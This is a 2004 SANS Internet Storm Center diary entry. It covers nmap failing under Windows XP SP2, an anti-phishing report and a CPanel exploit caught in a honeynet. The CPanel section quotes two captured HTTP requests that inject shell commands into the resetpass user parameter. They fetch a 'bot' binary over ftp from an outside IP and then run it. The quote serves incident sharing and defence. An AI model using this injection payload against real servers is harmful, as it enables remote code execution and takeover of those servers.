Threat Level: green Handler on Duty: Bojan Zdrnja

SANS ISC: SP2 breaks nmap, others - *Anti*phishing - Application exploits - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
SP2 breaks nmap, others - *Anti*phishing - Application exploits
nmap non-functional under XP SP2

The extremely popular port-scanner "nmap" became an early victim of XP SP2 today when Fyodor, nmap's author, announced that the tool does not function under Windows XP Service Pack 2. This is due to the removal of XP's innate ability to send TCP packets over "raw" sockets. This is likely a temporary situation, as nmap is fully functional on platforms without native raw socket support.

http://seclists.org/lists/nmap-hackers/2004/Jul-Sep/0002.html

Remember, we're still sharing our SP2 experiences at the following link:

http://isc.sans.org/xpsp2.php

Antiphishing.org report for June

Since it wouldn't be a proper handler's diary without something phishing related ... Antiphishing.org has released their monthly report outlining which companies were targeted by fishing attacks the most often, which countries hosted the most phishing sites, the average lifespan of a phishing hole, and many more interesting findings.*

http://www.antiphishing.org/APWG_Phishing_Attack_Report-Jun2004.pdf

CPanel Exploits

One of our handlers caught an attempted CPanel exploit in his honeynet, and posed a request for additional CPanel exploit traffic. Here's what the handler saw:

GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';echo${BLA}-e${BLA}
open${BLA}64.222.183.58${BLA10723\\nuser${BLA}ftp${BLA}bla\\nget${BLA}bot
\\nquit\\n${BLA}|${BLA}ftp${BLA}-n%60%7C HTTP/1.0

followed by the execution:

GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';./bot%60%7C HTTP/1.0

I'd like to extend the request to include all kinds of application level attacks. As we slowly but surely develop defenses against the classical stack-smashing attacks (and hopefully begin coding in such a way where they become irrelevant), application level attacks will become increasingly profitable to the attacker. Besides the (usually) softer target, application attacks have the added benefit of frequently slipping past the classical perimeter defense mechanisms of traditional IDS and firewalls. Furthermore, by popping a service and rooting a box, the attacker simply owns the box - but, if the attacker can successfully exploit application level flaws, he or she can own the *data*, which more often than not is a much more valuable prize.

====================

Cory Altheide

Handler on Duty

====================


*Just to clarify, I mean that there are many more findings that are interesting, not many other findings that are more interesting than the ones I've mentioned already. I really wish the English language allowed for the use of parenthesis in the manner algebra does = (many more) (interesting findings) vs. many (more interesting findings).
Cory Altheide

19 Posts

Sign Up for Free or Log In to start participating in the conversation!